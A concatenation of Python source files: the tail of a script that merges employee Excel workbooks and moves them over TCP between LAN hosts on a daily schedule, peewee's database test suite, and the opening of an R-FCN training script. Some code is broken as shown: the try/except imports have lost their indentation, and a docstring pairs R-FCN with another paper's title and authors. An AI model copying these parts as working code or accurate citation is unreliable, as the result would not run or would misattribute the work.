        s.send(f"{filename}{SEPARATOR}{filesize}".encode())
        # start sending the file
        progress = tqdm.tqdm(range(filesize), f"Sending {filename}",
                             unit="B", unit_scale=True, unit_divisor=1024)
        with open(filename, "rb") as f:
            for _ in progress:
                # read the bytes from the file
                bytes_read = f.read(BUFFER_SIZE)
                if not bytes_read:
                    # file transmitting is done
                    break
                # we use sendall to assure transmission in busy networks
                s.sendall(bytes_read)
                # update the progress bar
                progress.update(len(bytes_read))
    finally:
        # Close even if the transfer fails mid-way (original leaked here).
        s.close()
def sendr2(port=5005):
    """Send source.xlsx to the receiver host over TCP (second receiver).

    :param port: destination TCP port.  Defaults to 5005 (the original
        hard-coded value) so existing zero-argument callers keep working.
    """
    SEPARATOR = "<SEPARATOR>"
    BUFFER_SIZE = 4096  # send 4096 bytes each time step
    # the ip address or hostname of the server, the receiver
    host = "192.168.0.104"
    # the name of file we want to send, make sure it exists
    filename = "source.xlsx"
    # get the file size
    filesize = os.path.getsize(filename)

    # create the client socket
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print(f"[+] Connecting to {host}:{port}")
    s.connect((host, port))
    print("[+] Connected.")
    try:
        # Send the real filename and filesize header; the original sent
        # the literal string "(unknown)" as the filename.
        s.send(f"{filename}{SEPARATOR}{filesize}".encode())
        # start sending the file
        progress = tqdm.tqdm(range(filesize), f"Sending {filename}",
                             unit="B", unit_scale=True, unit_divisor=1024)
        with open(filename, "rb") as f:
            for _ in progress:
                # read the bytes from the file
                bytes_read = f.read(BUFFER_SIZE)
                if not bytes_read:
                    # file transmitting is done
                    break
                # we use sendall to assure transmission in busy networks
                s.sendall(bytes_read)
                # update the progress bar
                progress.update(len(bytes_read))
    finally:
        # Close even if the transfer fails mid-way (original leaked here).
        s.close()
def serr():
    """Rebuild source.xlsx from template.xlsx, then merge employee columns.

    Copies every cell of template.xlsx into a fresh source.xlsx, then
    fills columns D and E from Emp2.xlsx, falling back to Emp.xlsx for
    any cell Emp2.xlsx left empty.
    """
    # Start from an empty workbook so stale data never survives a run.
    workbook = Workbook()
    sheet = workbook.active  # NOTE(review): unused — confirm it can be dropped
    workbook.save(filename="source.xlsx")
    filename ="template.xlsx"
    wb1 = xl.load_workbook(filename)
    ws1 = wb1.worksheets[0]
    filename1 ="source.xlsx"
    wb2 = xl.load_workbook(filename1)
    ws2 = wb2.active
    mr = ws1.max_row
    mc = ws1.max_column
    # Cell-by-cell copy of the template into the fresh source workbook.
    for i in range (1, mr + 1):
        for j in range (1, mc + 1):
            c = ws1.cell(row = i, column = j)
            ws2.cell(row = i, column = j).value = c.value
    wb2.save(str(filename1))
    # Reload the three workbooks for the column-merge phase.
    wb0 = openpyxl.load_workbook('Emp.xlsx')
    ws0 = wb0.active
    wb1 = openpyxl.load_workbook('Emp2.xlsx')
    ws1 = wb1.active
    wb2 = openpyxl.load_workbook('source.xlsx')
    ws2 = wb2.active
    # Column D: take Emp2 values first, then backfill blanks from Emp.
    for src, dst in zip(ws1['D:D'], ws2['D:D']):
        dst.value = src.value
    for src, dst in zip(ws0['D:D'], ws2['D:D']):
        if not dst.value:
            dst.value = src.value
    # Column E: same merge order as column D.
    for src, dst in zip(ws1['E:E'], ws2['E:E']):
        dst.value = src.value
    for src, dst in zip(ws0['E:E'], ws2['E:E']):
        if not dst.value:
            dst.value = src.value
    wb2.save('source.xlsx')
    time.sleep(0.5)
    #os.remove("source.xlsx")
# Listener addresses/ports for the two receiver processes.
h1='0.0.0.0'
h2='0.0.0.0'
p1=5001
p2=5002
su1=5003
su2=5005
# NOTE(review): p1/p2 are immediately rebound from port ints to Process
# objects below — the ints are captured in args first, but the names are
# confusingly reused; consider renaming.
p1 = multiprocessing.Process(target=recvr, args=(h1,p1,))
p2 = multiprocessing.Process(target=recvr, args=(h2,p2,))
# NOTE(review): s1/s2 are never started by main(); both target sendr (s2
# likely meant sendr2) and pass an argument sendr's original zero-arg
# signature did not accept — confirm intent before starting them.
s1 = multiprocessing.Process(target=sendr, args=(su1,))
s2 = multiprocessing.Process(target=sendr, args=(su2,))
t1 = threading.Thread(target=sendr)
t2 = threading.Thread(target=sendr2)
def main():
    """Receive both uploads, merge them into source.xlsx, then send it out.

    NOTE(review): Process/Thread objects cannot be started twice, yet
    schedule calls main() daily — the second scheduled run will raise.
    Confirm whether the workers should be constructed inside main().
    """
    # Receive phase: both receiver processes run to completion.
    p1.start()
    time.sleep(0.1)
    p2.start()
    time.sleep(0.1)
    time.sleep(0.1)
    p1.join()
    p2.join()
    # Merge the received workbooks into source.xlsx.
    serr()
    # Send phase: push the merged file to both destinations.
    t1.start()
    time.sleep(0.5)
    t2.start()
    time.sleep(0.5)
    t1.join()
    time.sleep(0.5)
    t2.join()
    time.sleep(0.5)
if __name__ == "__main__":
    # Required on Windows when the script is frozen into an executable.
    multiprocessing.freeze_support()
    schedule.every().day.at("10:23").do(main)
    schedule.every().day.at("17:52").do(main)
    # NOTE(review): this loop busy-waits at 100% CPU; a short time.sleep()
    # between run_pending() calls is the usual pattern — confirm.
    while True:
        schedule.run_pending()
database.py | from itertools import permutations
try:
from Queue import Queue
except ImportError:
from queue import Queue
import re
import threading
from peewee import *
from peewee import Database
from peewee import FIELD
from peewee import attrdict
from peewee import sort_models
from .base import BaseTestCase
from .base import DatabaseTestCase
from .base import IS_MYSQL
from .base import IS_POSTGRESQL
from .base import IS_SQLITE
from .base import ModelTestCase
from .base import TestModel
from .base import db
from .base import db_loader
from .base import get_in_memory_db
from .base import requires_models
from .base import requires_postgresql
from .base_models import Category
from .base_models import Tweet
from .base_models import User
class TestDatabase(DatabaseTestCase):
    """Core Database behavior: pragmas, connection lifecycle, binding,
    batch-commit helpers and server-version detection (SQLite-backed)."""

    database = db_loader('sqlite3')

    def test_pragmas(self):
        """Pragma attributes round-trip through the live connection."""
        self.database.cache_size = -2048
        self.assertEqual(self.database.cache_size, -2048)
        self.database.cache_size = -4096
        self.assertEqual(self.database.cache_size, -4096)

        # 'on'/'off' strings are normalized to 1/0 by SQLite.
        self.database.foreign_keys = 'on'
        self.assertEqual(self.database.foreign_keys, 1)
        self.database.foreign_keys = 'off'
        self.assertEqual(self.database.foreign_keys, 0)

    def test_timeout_semantics(self):
        """timeout (seconds) maps onto busy_timeout (ms) and persists."""
        # Verify the default timeout of 5 seconds / 5000ms busy_timeout.
        self.assertEqual(self.database.timeout, 5)
        self.assertEqual(self.database.pragma('busy_timeout'), 5000)

        self.database.timeout = 2.5
        self.assertEqual(self.database.timeout, 2.5)
        self.assertEqual(self.database.pragma('busy_timeout'), 2500)

        # The setting survives a close/reconnect cycle.
        self.database.close()
        self.database.connect()

        self.assertEqual(self.database.timeout, 2.5)
        self.assertEqual(self.database.pragma('busy_timeout'), 2500)

    def test_pragmas_deferred(self):
        """Pragmas given to a deferred database survive init()."""
        pragmas = (('journal_mode', 'wal'),)
        db = SqliteDatabase(None, pragmas=pragmas)
        self.assertEqual(db._pragmas, pragmas)

        # Test pragmas preserved after initializing.
        db.init(':memory:')
        self.assertEqual(db._pragmas, pragmas)

        db = SqliteDatabase(None)
        self.assertEqual(db._pragmas, ())

        # Test pragmas are set and subsequently overwritten.
        db.init(':memory:', pragmas=pragmas)
        self.assertEqual(db._pragmas, pragmas)

        db.init(':memory:', pragmas=())
        self.assertEqual(db._pragmas, ())

        # Test when specified twice, the previous value is overwritten.
        db = SqliteDatabase(None, pragmas=pragmas)
        db.init(':memory:', pragmas=(('cache_size', -8000),))
        self.assertEqual(db._pragmas, (('cache_size', -8000),))

    def test_pragmas_as_dict(self):
        """Dict-form pragmas are normalized to (key, value) pairs."""
        pragmas = {'journal_mode': 'wal'}
        pragma_list = [('journal_mode', 'wal')]

        db = SqliteDatabase(':memory:', pragmas=pragmas)
        self.assertEqual(db._pragmas, pragma_list)

        # Test deferred databases correctly handle pragma dicts.
        db = SqliteDatabase(None, pragmas=pragmas)
        self.assertEqual(db._pragmas, pragma_list)

        db.init(':memory:')
        self.assertEqual(db._pragmas, pragma_list)

        db.init(':memory:', pragmas={})
        self.assertEqual(db._pragmas, [])

    def test_pragmas_permanent(self):
        """pragma(..., permanent=True) is re-applied on reconnect."""
        db = SqliteDatabase(':memory:')
        db.execute_sql('pragma foreign_keys=0')
        self.assertEqual(db.foreign_keys, 0)

        db.pragma('foreign_keys', 1, True)
        self.assertEqual(db.foreign_keys, 1)

        db.close()
        db.connect()
        self.assertEqual(db.foreign_keys, 1)

    def test_context_settings(self):
        """Subclass/ctor field_types and operations merge into SQL state."""
        class TestDatabase(Database):
            field_types = {'BIGINT': 'TEST_BIGINT', 'TEXT': 'TEST_TEXT'}
            operations = {'LIKE': '~', 'NEW': '->>'}
            param = '$'

        test_db = TestDatabase(None)
        state = test_db.get_sql_context().state

        # Overridden entries take effect; unspecified ones keep defaults.
        self.assertEqual(state.field_types['BIGINT'], 'TEST_BIGINT')
        self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
        self.assertEqual(state.field_types['INT'], FIELD.INT)
        self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)

        self.assertEqual(state.operations['LIKE'], '~')
        self.assertEqual(state.operations['NEW'], '->>')
        self.assertEqual(state.operations['ILIKE'], 'ILIKE')

        self.assertEqual(state.param, '$')
        self.assertEqual(state.quote, '""')

        # Constructor overrides layer on top of the class-level overrides.
        test_db2 = TestDatabase(None, field_types={'BIGINT': 'XXX_BIGINT',
                                                   'INT': 'XXX_INT'})
        state = test_db2.get_sql_context().state
        self.assertEqual(state.field_types['BIGINT'], 'XXX_BIGINT')
        self.assertEqual(state.field_types['TEXT'], 'TEST_TEXT')
        self.assertEqual(state.field_types['INT'], 'XXX_INT')
        self.assertEqual(state.field_types['VARCHAR'], FIELD.VARCHAR)

    def test_connection_state(self):
        """connection() opens; close() closes; reconnect re-opens."""
        conn = self.database.connection()
        self.assertFalse(self.database.is_closed())
        self.database.close()
        self.assertTrue(self.database.is_closed())
        conn = self.database.connection()
        self.assertFalse(self.database.is_closed())

    def test_db_context_manager(self):
        """The database context manager opens on entry, closes on exit."""
        self.database.close()
        self.assertTrue(self.database.is_closed())

        with self.database:
            self.assertFalse(self.database.is_closed())

        self.assertTrue(self.database.is_closed())
        self.database.connect()
        self.assertFalse(self.database.is_closed())

        # Enter context with an already-open db.
        with self.database:
            self.assertFalse(self.database.is_closed())

        # Closed after exit.
        self.assertTrue(self.database.is_closed())

    def test_connection_initialization(self):
        """_initialize_connection runs once per new connection only."""
        state = {'count': 0}
        class TestDatabase(SqliteDatabase):
            def _initialize_connection(self, conn):
                state['count'] += 1
        db = TestDatabase(':memory:')
        self.assertEqual(state['count'], 0)

        conn = db.connection()
        self.assertEqual(state['count'], 1)

        # Since already connected, nothing happens here.
        conn = db.connection()
        self.assertEqual(state['count'], 1)

    def test_connect_semantics(self):
        """connect() raises when open unless reuse_if_open is given."""
        state = {'count': 0}
        class TestDatabase(SqliteDatabase):
            def _initialize_connection(self, conn):
                state['count'] += 1
        db = TestDatabase(':memory:')

        db.connect()
        self.assertEqual(state['count'], 1)
        self.assertRaises(OperationalError, db.connect)
        self.assertEqual(state['count'], 1)
        self.assertFalse(db.connect(reuse_if_open=True))
        self.assertEqual(state['count'], 1)

        with db:
            self.assertEqual(state['count'], 1)
            self.assertFalse(db.is_closed())

        self.assertTrue(db.is_closed())
        with db:
            # A fresh connection triggers initialization again.
            self.assertEqual(state['count'], 2)

    def test_execute_sql(self):
        """Raw execute_sql supports DDL, parameterized DML and queries."""
        self.database.execute_sql('CREATE TABLE register (val INTEGER);')
        self.database.execute_sql('INSERT INTO register (val) VALUES (?), (?)',
                                  (1337, 31337))
        cursor = self.database.execute_sql(
            'SELECT val FROM register ORDER BY val')
        self.assertEqual(cursor.fetchall(), [(1337,), (31337,)])
        self.database.execute_sql('DROP TABLE register;')

    def test_bind_helpers(self):
        """bind_ctx() rebinds models temporarily; bind() permanently."""
        db = get_in_memory_db()
        alt_db = get_in_memory_db()

        class Base(Model):
            class Meta:
                database = db

        class A(Base):
            a = TextField()
        class B(Base):
            b = TextField()

        db.create_tables([A, B])

        # Temporarily bind A to alt_db.
        with alt_db.bind_ctx([A]):
            self.assertFalse(A.table_exists())
            self.assertTrue(B.table_exists())

        self.assertTrue(A.table_exists())
        self.assertTrue(B.table_exists())

        alt_db.bind([A])
        self.assertFalse(A.table_exists())
        self.assertTrue(B.table_exists())

        db.close()
        alt_db.close()

    def test_batch_commit(self):
        """batch_commit() yields all items and commits per batch."""
        class PatchCommitDatabase(SqliteDatabase):
            commits = 0
            # Neutralize real transactions; only count commit() calls.
            def begin(self): pass
            def commit(self):
                self.commits += 1

        db = PatchCommitDatabase(':memory:')

        def assertBatches(n_objs, batch_size, n_commits):
            accum = []
            source = range(n_objs)
            db.commits = 0

            for item in db.batch_commit(source, batch_size):
                accum.append(item)

            self.assertEqual(accum, list(range(n_objs)))
            self.assertEqual(db.commits, n_commits)

        # Expected commit count is ceil(n_objs / batch_size).
        assertBatches(12, 1, 12)
        assertBatches(12, 2, 6)
        assertBatches(12, 3, 4)
        assertBatches(12, 4, 3)
        assertBatches(12, 5, 3)
        assertBatches(12, 6, 2)
        assertBatches(12, 7, 2)
        assertBatches(12, 11, 2)
        assertBatches(12, 12, 1)
        assertBatches(12, 13, 1)

    def test_server_version(self):
        """server_version is set on connect and not reset by close."""
        class FakeDatabase(Database):
            server_version = None
            def _connect(self):
                return 1
            def _close(self, conn):
                pass
            def _set_server_version(self, conn):
                self.server_version = (1, 33, 7)

        db = FakeDatabase(':memory:')
        self.assertTrue(db.server_version is None)
        db.connect()
        self.assertEqual(db.server_version, (1, 33, 7))
        db.close()
        self.assertEqual(db.server_version, (1, 33, 7))

        # A pre-set version is preserved across connect().
        db.server_version = (1, 2, 3)
        db.connect()
        self.assertEqual(db.server_version, (1, 2, 3))
        db.close()
class TestThreadSafety(ModelTestCase):
    """Concurrent reads and writes from multiple threads do not lose data."""

    nthreads = 4  # worker threads per test
    nrows = 10  # rows written/read per thread
    requires = [User]

    def test_multiple_writers(self):
        """Each thread writes a disjoint range; all rows must be present."""
        def create_users(idx):
            # Disjoint id ranges avoid username collisions across threads.
            for i in range(idx * self.nrows, (idx + 1) * self.nrows):
                User.create(username='u%d' % i)

        threads = []
        for i in range(self.nthreads):
            threads.append(threading.Thread(target=create_users, args=(i,)))
        for t in threads: t.start()
        for t in threads: t.join()

        self.assertEqual(User.select().count(), self.nrows * self.nthreads)

    def test_multiple_readers(self):
        """Concurrent readers all complete and report a count per query."""
        data = Queue()
        def read_user_count(n):
            for i in range(n):
                data.put(User.select().count())

        threads = []
        for i in range(self.nthreads):
            threads.append(threading.Thread(target=read_user_count,
                                            args=(self.nrows,)))
        for t in threads: t.start()
        for t in threads: t.join()
        self.assertEqual(data.qsize(), self.nrows * self.nthreads)
class TestDeferredDatabase(BaseTestCase):
    """A database constructed with None is unusable until init() is called."""

    def test_deferred_database(self):
        deferred_db = SqliteDatabase(None)
        self.assertTrue(deferred_db.deferred)

        class DeferredModel(Model):
            class Meta:
                database = deferred_db

        # Connecting or querying before init() must fail.
        self.assertRaises(Exception, deferred_db.connect)
        query = DeferredModel.select()
        self.assertRaises(Exception, query.execute)

        deferred_db.init(':memory:')
        self.assertFalse(deferred_db.deferred)

        conn = deferred_db.connect()
        self.assertFalse(deferred_db.is_closed())
        DeferredModel._schema.create_all()
        self.assertEqual(list(DeferredModel.select()), [])

        # Re-initializing with None returns the database to deferred state.
        deferred_db.init(None)
        self.assertTrue(deferred_db.deferred)

        # The connection was automatically closed.
        self.assertTrue(deferred_db.is_closed())
class CatToy(TestModel):
    """Model living in the non-default 'huey' schema (see TestSchemaNamespace)."""

    description = TextField()

    class Meta:
        schema = 'huey'
@requires_postgresql
class TestSchemaNamespace(ModelTestCase):
    """CRUD against a model bound to a Postgres schema other than public."""

    requires = [CatToy]

    def setUp(self):
        # The schema must exist before the base class creates the tables.
        with self.database:
            self.execute('CREATE SCHEMA huey;')
        super(TestSchemaNamespace, self).setUp()

    def tearDown(self):
        # Drop tables first (base class), then remove the schema itself.
        super(TestSchemaNamespace, self).tearDown()
        with self.database:
            self.execute('DROP SCHEMA huey;')

    def test_schema(self):
        """Rows written to the schema-qualified table can be read back."""
        toy = CatToy.create(description='fur mouse')
        toy_db = CatToy.select().where(CatToy.id == toy.id).get()
        self.assertEqual(toy.id, toy_db.id)
        self.assertEqual(toy.description, toy_db.description)
class TestSqliteIsolation(ModelTestCase):
    """Uncommitted changes in one SQLite connection are invisible to others."""

    database = db_loader('sqlite3')
    requires = [User]

    def test_sqlite_isolation(self):
        for username in ('u1', 'u2', 'u3'): User.create(username=username)

        # Committed rows are visible from a second, independent connection.
        new_db = db_loader('sqlite3')
        curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
        self.assertEqual(curs.fetchone()[0], 3)

        self.assertEqual(User.select().count(), 3)  # Same connection.
        self.assertEqual(User.delete().execute(), 3)  # Same connection.

        with self.database.atomic():
            User.create(username='u4')
            User.create(username='u5')

            # Second conn does not see the changes.
            curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
            self.assertEqual(curs.fetchone()[0], 0)

            # Third conn does not see the changes.
            new_db2 = db_loader('sqlite3')
            curs = new_db2.execute_sql('SELECT COUNT(*) FROM users')
            self.assertEqual(curs.fetchone()[0], 0)

            # Original connection sees its own changes.
            self.assertEqual(User.select().count(), 2)

        # After commit, other connections observe the new rows.
        curs = new_db.execute_sql('SELECT COUNT(*) FROM users')
        self.assertEqual(curs.fetchone()[0], 2)
class UniqueModel(TestModel):
    """Model with a single-column unique index (see TestIntrospection)."""

    name = CharField(unique=True)
class IndexedModel(TestModel):
    """Model with composite indexes, one unique and one non-unique."""

    first = CharField()
    last = CharField()
    dob = DateField()

    class Meta:
        indexes = (
            # (columns, unique?)
            (('first', 'last', 'dob'), True),
            (('first', 'last'), False),
        )
class Note(TestModel):
    """Model backing the VIEW-introspection tests (table name 'notes')."""

    content = TextField()
    ts = DateTimeField()
    status = IntegerField()

    class Meta:
        table_name = 'notes'
class TestIntrospection(ModelTestCase):
    """Exercise database metadata introspection: tables, indexes, columns,
    primary keys, views and foreign keys."""

    requires = [Category, User, UniqueModel, IndexedModel]

    def test_table_exists(self):
        """table_exists() is true only for tables that were created."""
        self.assertTrue(self.database.table_exists(User._meta.table_name))
        self.assertFalse(self.database.table_exists('nuggies'))

    def test_get_tables(self):
        """get_tables() tracks table creation and removal."""
        tables = self.database.get_tables()
        required = set(m._meta.table_name for m in self.requires)
        self.assertTrue(required.issubset(set(tables)))

        UniqueModel._schema.drop_all()
        tables = self.database.get_tables()
        self.assertFalse(UniqueModel._meta.table_name in tables)

    def test_get_indexes(self):
        """get_indexes() reports name, columns and uniqueness per index."""
        indexes = self.database.get_indexes('unique_model')
        # Filter out the implicit primary-key index (backend-specific name).
        data = [(index.name, index.columns, index.unique, index.table)
                for index in indexes
                if index.name not in ('unique_model_pkey', 'PRIMARY')]
        self.assertEqual(data, [
            ('unique_model_name', ['name'], True, 'unique_model')])

        indexes = self.database.get_indexes('indexed_model')
        data = [(index.name, index.columns, index.unique, index.table)
                for index in indexes
                if index.name not in ('indexed_model_pkey', 'PRIMARY')]
        self.assertEqual(sorted(data), [
            ('indexed_model_first_last', ['first', 'last'], False,
             'indexed_model'),
            ('indexed_model_first_last_dob', ['first', 'last', 'dob'], True,
             'indexed_model')])

    def test_get_columns(self):
        """get_columns() reports name, nullability and primary-key flag."""
        columns = self.database.get_columns('indexed_model')
        data = [(c.name, c.null, c.primary_key, c.table)
                for c in columns]
        self.assertEqual(data, [
            ('id', False, True, 'indexed_model'),
            ('first', False, False, 'indexed_model'),
            ('last', False, False, 'indexed_model'),
            ('dob', False, False, 'indexed_model')])

        columns = self.database.get_columns('category')
        data = [(c.name, c.null, c.primary_key, c.table)
                for c in columns]
        self.assertEqual(data, [
            ('name', False, True, 'category'),
            ('parent_id', True, False, 'category')])

    def test_get_primary_keys(self):
        """get_primary_keys() works for default and custom primary keys."""
        primary_keys = self.database.get_primary_keys('users')
        self.assertEqual(primary_keys, ['id'])

        primary_keys = self.database.get_primary_keys('category')
        self.assertEqual(primary_keys, ['name'])

    @requires_models(Note)
    def test_get_views(self):
        """get_views() returns view names and (normalized) definitions."""
        def normalize_view_meta(view_meta):
            # FIX: raw string — '\s' is an invalid escape sequence in a
            # plain string literal (SyntaxWarning on CPython >= 3.12);
            # r'\n\s+' matches the same text via the regex engine.
            sql_ws_norm = re.sub(r'\n\s+', ' ', view_meta.sql)
            return view_meta.name, (sql_ws_norm
                                    .replace('`peewee_test`.', '')
                                    .replace('`notes`.', '')
                                    .replace('`', ''))

        def assertViews(expected):
            # Create two sample views.
            self.database.execute_sql('CREATE VIEW notes_public AS '
                                      'SELECT content, ts FROM notes '
                                      'WHERE status = 1 ORDER BY ts DESC')
            self.database.execute_sql('CREATE VIEW notes_deleted AS '
                                      'SELECT content FROM notes '
                                      'WHERE status = 9 ORDER BY id DESC')
            try:
                views = self.database.get_views()
                normalized = sorted([normalize_view_meta(v) for v in views])
                self.assertEqual(normalized, expected)

                # Ensure that we can use get_columns to introspect views.
                columns = self.database.get_columns('notes_deleted')
                self.assertEqual([c.name for c in columns], ['content'])

                columns = self.database.get_columns('notes_public')
                self.assertEqual([c.name for c in columns], ['content', 'ts'])
            finally:
                self.database.execute_sql('DROP VIEW notes_public;')
                self.database.execute_sql('DROP VIEW notes_deleted;')

        # Unfortunately, all databases seem to represent VIEW definitions
        # differently internally.
        if IS_SQLITE:
            assertViews([
                ('notes_deleted', ('CREATE VIEW notes_deleted AS '
                                   'SELECT content FROM notes '
                                   'WHERE status = 9 ORDER BY id DESC')),
                ('notes_public', ('CREATE VIEW notes_public AS '
                                  'SELECT content, ts FROM notes '
                                  'WHERE status = 1 ORDER BY ts DESC'))])
        elif IS_MYSQL:
            assertViews([
                ('notes_deleted',
                 ('select content AS content from notes '
                  'where status = 9 order by id desc')),
                ('notes_public',
                 ('select content AS content,ts AS ts from notes '
                  'where status = 1 order by ts desc'))])
        elif IS_POSTGRESQL:
            assertViews([
                ('notes_deleted',
                 ('SELECT notes.content FROM notes '
                  'WHERE (notes.status = 9) ORDER BY notes.id DESC;')),
                ('notes_public',
                 ('SELECT notes.content, notes.ts FROM notes '
                  'WHERE (notes.status = 1) ORDER BY notes.ts DESC;'))])

    @requires_models(User, Tweet, Category)
    def test_get_foreign_keys(self):
        """get_foreign_keys() reports (column, target table/column) pairs."""
        foreign_keys = self.database.get_foreign_keys('tweet')
        data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
                for fk in foreign_keys]
        self.assertEqual(data, [
            ('user_id', 'users', 'id', 'tweet')])

        # Self-referential FK on the category table.
        foreign_keys = self.database.get_foreign_keys('category')
        data = [(fk.column, fk.dest_table, fk.dest_column, fk.table)
                for fk in foreign_keys]
        self.assertEqual(data, [
            ('parent_id', 'category', 'name', 'category')])
class TestSortModels(BaseTestCase):
    """sort_models() orders models so FK targets precede their referrers."""

    def test_sort_models(self):
        class A(Model):
            pass
        class B(Model):
            a = ForeignKeyField(A)
        class C(Model):
            b = ForeignKeyField(B)
        class D(Model):
            c = ForeignKeyField(C)
        class E(Model):
            pass

        # A <- B <- C <- D is a dependency chain; E is independent.
        expected = [A, B, C, D, E]
        for ordering in permutations(expected):
            self.assertEqual(sort_models(ordering), expected)
class TestDBProxy(BaseTestCase):
    """Proxy/DatabaseProxy delegate to the real database once initialized."""

    def test_proxy_context_manager(self):
        db = Proxy()

        class User(Model):
            username = TextField()

            class Meta:
                database = db

        # Before initialize(), database operations fail.
        self.assertRaises(AttributeError, User.create_table)

        sqlite_db = SqliteDatabase(':memory:')
        db.initialize(sqlite_db)
        User.create_table()

        # The proxy also forwards the context-manager protocol.
        with db:
            self.assertFalse(db.is_closed())
        self.assertTrue(db.is_closed())

    def test_db_proxy(self):
        db = Proxy()

        class BaseModel(Model):
            class Meta:
                database = db

        class User(BaseModel):
            username = TextField()

        class Tweet(BaseModel):
            user = ForeignKeyField(User, backref='tweets')
            message = TextField()

        sqlite_db = SqliteDatabase(':memory:')
        db.initialize(sqlite_db)

        # All models bound to the proxy now see the real database.
        self.assertEqual(User._meta.database.database, ':memory:')
        self.assertEqual(Tweet._meta.database.database, ':memory:')

        self.assertTrue(User._meta.database.is_closed())
        self.assertTrue(Tweet._meta.database.is_closed())
        sqlite_db.connect()
        self.assertFalse(User._meta.database.is_closed())
        self.assertFalse(Tweet._meta.database.is_closed())
        sqlite_db.close()

    def test_proxy_decorator(self):
        db = DatabaseProxy()

        # Decorators may be applied before the proxy is initialized.
        @db.connection_context()
        def with_connection():
            self.assertFalse(db.is_closed())

        @db.atomic()
        def with_transaction():
            self.assertTrue(db.in_transaction())

        @db.manual_commit()
        def with_manual_commit():
            self.assertTrue(db.in_transaction())

        db.initialize(SqliteDatabase(':memory:'))

        with_connection()
        self.assertTrue(db.is_closed())

        with_transaction()
        self.assertFalse(db.in_transaction())

        with_manual_commit()
        self.assertFalse(db.in_transaction())
class Data(TestModel):
    """Simple key/value model, explicitly bound to SQLite's 'main' schema
    so its queries are schema-qualified (see TestAttachDatabase below)."""
    key = TextField()
    value = TextField()
    class Meta:
        # "main" is SQLite's name for the primary (non-attached) database.
        schema = 'main'
class TestAttachDatabase(ModelTestCase):
    """Tests for SQLite ATTACH / DETACH DATABASE support."""
    database = db_loader('sqlite3')
    requires = [Data]
    def test_attach(self):
        """An attached in-memory schema supports DDL/DML; the attachment is
        re-applied on reconnect but in-memory data does not survive it."""
        database = self.database
        Data.create(key='k1', value='v1')
        Data.create(key='k2', value='v2')
        # Attach an in-memory cache database.
        database.attach(':memory:', 'cache')
        # Clone data into the in-memory cache.
        class CacheData(Data):
            class Meta:
                schema = 'cache'
        self.assertFalse(CacheData.table_exists())
        CacheData.create_table(safe=False)
        self.assertTrue(CacheData.table_exists())
        (CacheData
         .insert_from(Data.select(), fields=[Data.id, Data.key, Data.value])
         .execute())
        # Update the source data.
        query = Data.update({Data.value: Data.value + '-x'})
        self.assertEqual(query.execute(), 2)
        # Verify the source data was updated.
        query = Data.select(Data.key, Data.value).order_by(Data.key)
        self.assertSQL(query, (
            'SELECT "t1"."key", "t1"."value" '
            'FROM "main"."data" AS "t1" '
            'ORDER BY "t1"."key"'), [])
        self.assertEqual([v for k, v in query.tuples()], ['v1-x', 'v2-x'])
        # Verify the cached data reflects the original data, pre-update.
        query = (CacheData
                 .select(CacheData.key, CacheData.value)
                 .order_by(CacheData.key))
        self.assertSQL(query, (
            'SELECT "t1"."key", "t1"."value" '
            'FROM "cache"."cache_data" AS "t1" '
            'ORDER BY "t1"."key"'), [])
        self.assertEqual([v for k, v in query.tuples()], ['v1', 'v2'])
        database.close()
        # On re-connecting, the in-memory database will be re-attached.
        database.connect()
        # Cache-Data table does not exist (in-memory contents were lost).
        self.assertFalse(CacheData.table_exists())
        # Double-check the sqlite master table.
        curs = database.execute_sql('select * from cache.sqlite_master;')
        self.assertEqual(curs.fetchall(), [])
        # Because it's in-memory, the table needs to be re-created.
        CacheData.create_table(safe=False)
        self.assertEqual(CacheData.select().count(), 0)
        # Original data is still there.
        self.assertEqual(Data.select().count(), 2)
    def test_attach_detach(self):
        """Re-attaching the same database to a name is falsy; attaching a
        different one raises; detach() unmaps the schema name."""
        database = self.database
        Data.create(key='k1', value='v1')
        Data.create(key='k2', value='v2')
        # Attach an in-memory cache database.
        database.attach(':memory:', 'cache')
        curs = database.execute_sql('select * from cache.sqlite_master')
        self.assertEqual(curs.fetchall(), [])
        # Same database, same name: no-op (returns falsy).
        self.assertFalse(database.attach(':memory:', 'cache'))
        # Different database on an already-bound name: error.
        self.assertRaises(OperationalError, database.attach, 'foo.db', 'cache')
        self.assertTrue(database.detach('cache'))
        self.assertFalse(database.detach('cache'))
        # Once detached, the schema-qualified name is no longer resolvable.
        self.assertRaises(OperationalError, database.execute_sql,
                          'select * from cache.sqlite_master')
    def test_sqlite_schema_support(self):
        """get_tables() honors the schema= keyword for attached databases."""
        class CacheData(Data):
            class Meta:
                schema = 'cache'
        # Attach an in-memory cache database and create the cache table.
        self.database.attach(':memory:', 'cache')
        CacheData.create_table()
        tables = self.database.get_tables()
        self.assertEqual(tables, ['data'])
        tables = self.database.get_tables(schema='cache')
        self.assertEqual(tables, ['cache_data'])
|
train_rfcn_fix_hard.py | #!/usr/bin/env python
# --------------------------------------------------------
# R-FCN
# Copyright (c) 2016 Yuwen Xiong, Haozhi Qi
# Licensed under The MIT License [see LICENSE for details]
# --------------------------------------------------------
"""Train a R-FCN network using alternating optimization.
This tool implements the alternating optimization algorithm described in our
NIPS 2015 paper ("R-FCN: Towards Real-time Object Detection with Region
Proposal Networks." Shaoqing Ren, Kaiming He, Ross Girshick, Jian Sun.)
"""
import _init_paths
from fast_rcnn.train import get_training_roidb, train_net
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from datasets.factory import get_imdb
from rpn.generate import imdb_proposals, imdb_rpn_compute_stats
import argparse
import pprint
import numpy as np
import sys, os
import multiprocessing as mp
import cPickle
import shutil
def parse_args():
    """Parse and return the command-line arguments for R-FCN training.

    Prints usage and exits with status 1 when invoked without arguments.
    """
    parser = argparse.ArgumentParser(description='Train a R-FCN network')
    # (flag, add_argument keyword arguments), registered in display order.
    option_specs = [
        ('--gpu', dict(dest='gpu_id', help='GPU device id to use [0]',
                       default=0, type=int)),
        ('--net_name', dict(dest='net_name',
                            help='network name (e.g., "ResNet-101")',
                            default=None, type=str)),
        ('--weights', dict(dest='pretrained_model',
                           help='initialize with pretrained model weights',
                           default=None, type=str)),
        ('--cfg', dict(dest='cfg_file', help='optional config file',
                       default=None, type=str)),
